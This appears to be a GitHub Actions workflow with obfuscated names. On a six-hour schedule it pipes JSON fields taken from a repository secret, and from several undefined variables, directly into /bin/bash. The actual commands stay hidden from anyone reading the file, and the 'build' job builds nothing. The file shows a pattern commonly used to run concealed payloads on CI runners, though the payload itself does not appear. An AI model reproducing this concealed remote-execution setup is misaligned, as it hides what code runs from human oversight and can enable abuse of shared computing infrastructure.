name: zhaoqingyun3456
on:
  workflow_dispatch:
  schedule:
    - cron: '46 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhaoqingyun3456
        env:
          ug49: ${{ secrets.ug49 }}
        run: |
          echo $ug49 | jq -r .tp2 | /bin/bash
          echo $kuhj512 | jq -r .z61 | /bin/bash
          echo $bjetn86962 | jq -r .bvdp73 | /bin/bash
          echo $uqrg79563 | jq -r .e75785 | /bin/bash
          echo $ag48 | jq -r .lvk4 | /bin/bash
          echo $rvx4 | jq -r .okqwj708 | /bin/bash
          echo $m56940 | jq -r .lsq410 | /bin/bash
          echo $nn3 | jq -r .hkoj2 | /bin/bash

